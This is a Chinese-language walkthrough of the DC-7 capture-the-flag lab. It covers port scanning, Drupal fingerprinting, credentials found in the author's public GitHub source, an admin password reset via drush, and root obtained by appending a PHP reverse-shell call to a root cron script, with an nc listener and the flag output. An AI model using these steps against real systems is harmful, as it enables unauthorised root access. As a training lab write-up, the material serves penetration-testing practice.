靶机描述
Description
DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
While this isn't an overly technical challenge, it isn't exactly easy.
While it's kind of a logical progression from an earlier DC release (I won't tell you which one), there are some new concepts involved, but you will need to figure those out for yourself. :-) If you need to resort to brute forcing or dictionary attacks, you probably won't succeed.
What you will need to do, is to think "outside" of the box.
Waaaaaay "outside" of the box. :-)
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
Technical Information
DC-7 is a VirtualBox VM built on Debian 64 bit, but there shouldn't be any issues running it on most PCs.
I have tested this on VMWare Player, but if there are any issues running this VM in VMware, have a read through of this.
It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.
Installation is simple - download it, unzip it, and then import it into VirtualBox or VMWare and away you go.
Important
While there should be no problems using this VM, by downloading it, you accept full responsibility for any unintentional damage that this VM may cause.
In saying that, there shouldn't be any problems, but I feel the need to throw this out there just in case.
Contact
I'm also very interested in hearing how people go about solving these challenges, so if you're up for writing a walkthrough, please do so and send me a link, or alternatively, follow me on Twitter, and DM me (you can unfollow after you've DM'd me if you'd prefer).
I can be contacted via Twitter - @DCAU7
实验环境
- kali2020:ip地址172.25.0.69
- DC7靶机:ip地址172.25.0.70
端口扫描
kali@kali:~$ nmap -A -p- 172.25.0.70
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-27 03:56 EST
Nmap scan report for 172.25.0.70
Host is up (0.0018s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 d0:02:e9:c7:5d:95:32:ab:10:99:89:84:34:3d:1e:f9 (RSA)
| 256 d0:d6:40:35:a7:34:a9:0a:79:34:ee:a9:6a:dd:f4:8f (ECDSA)
|_ 256 a8:55:d5:76:93:ed:4f:6f:f1:f7:a1:84:2f:af:bb:e1 (ED25519)
80/tcp open ssl/http Apache/2.4.25 (Debian)
|_http-generator: Drupal 8 (https://www.drupal.org)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/
| /user/password/ /user/login/ /user/logout/ /index.php/admin/
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Welcome to DC-7 | D7
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 121.15 seconds
网站指纹识别
通过whatweb工具识别得到该网站是基于Drupal8CMS搭建
kali@kali:~$ whatweb http://172.25.0.70
http://172.25.0.70 [200 OK] Apache[2.4.25], Content-Language[en], Country[RESERVED][ZZ], Drupal, HTML5, HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], IP[172.25.0.70], MetaGenerator[Drupal 8 (https://www.drupal.org)], PoweredBy[-block], Script, Title[Welcome to DC-7 | D7], UncommonHeaders[x-drupal-dynamic-cache,link,x-content-type-options,x-generator,x-drupal-cache], X-Frame-Options[SAMEORIGIN], X-UA-Compatible[IE=edge]
社会工程学
思路:查找该框架所存在的通用漏洞。
对已知漏洞进行分析利用发现不成功,遂转变思路。
现在我们把焦点关注在靶机描述上, 靶机描述中建议我们在盒子外面进行参考。
网站信息收集发现,该网站为这个人编写的。
是时候展现社会工程学了
查到其注册的推特账号,并在github上传了dc7的网站源码,对源码进行分析,得到了dc7靶机的一个账号和密码。
源码审计,在 config.php 发现用户及其密码信息
<?php
$servername = "localhost";
$username = "dc7user";
$password = "MdR3xOgB7#dW";
$dbname = "Staff";
$conn = mysqli_connect($servername, $username, $password, $dbname);
?>
主机信息收集
使用该账户ssh登录
本地邮件信息得到线索,root会以计划任务执行/opt/scripts/backups.sh脚本
审查脚本发现drush命令
drush sql-dump --result-file=/home/dc7user/backups/website.sql
drush命令,是drupal框架中用来做一些配置的命令,它可以改变用户名密码,我们通过这条命令更改admin后台密码
查看备份脚本文件 可以看到使用drush备份数据库的时候,先cd /var/www/html,
因此我们也切换到这个目录用drush命令试着改变默认用户admin的密码,修改成功!
dc7user@dc-7:~$ cd /var/www/html
dc7user@dc-7:/var/www/html$ drush user-password admin --password=123456
Changed password for admin [success]
dc7user@dc-7:/var/www/html$
提权
由于该脚本所属者为root所属组为www-data
故而使用www-data用户在计划任务脚本backups中追加反弹shell命令
echo "php /tmp/webshel.php" > /opt/scripts/backups.sh
这边我使用的是php反弹
使用蚁剑上传php反弹shell
待root用户计划任务运行backups脚本
kali执行 nc -lvvp 9999 端口监听
反弹成功拿下root权限,并在root用户家目录拿下flag~
kali@kali:~$ nc -lvvp 9999
listening on [any] 9999 ...
^[[B^[[B^[[B172.25.0.70: inverse host lookup failed: Unknown host
connect to [172.25.0.69] from (UNKNOWN) [172.25.0.70] 44232
/bin/sh: 0: can't access tty; job control turned off
# whoami
/bin/sh: 1:
whoami: not found
# /bin/bash
whoami
root
python -c 'import pty;pty.spawn("/bin/bash")'
root@dc-7:/var/www# cd ~
cd ~
root@dc-7:~# ls
ls
theflag.txt
root@dc-7:~# cat theflag.txt
cat theflag.txt
888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888
Congratulations!!!
Hope you enjoyed DC-7. Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.
I'm sending out an especially big thanks to:
@4nqr34z
@D4mianWayne
@0xmzfr
@theart42
If you enjoyed this CTF, send me a tweet via @DCAU7.
root@dc-7:~#
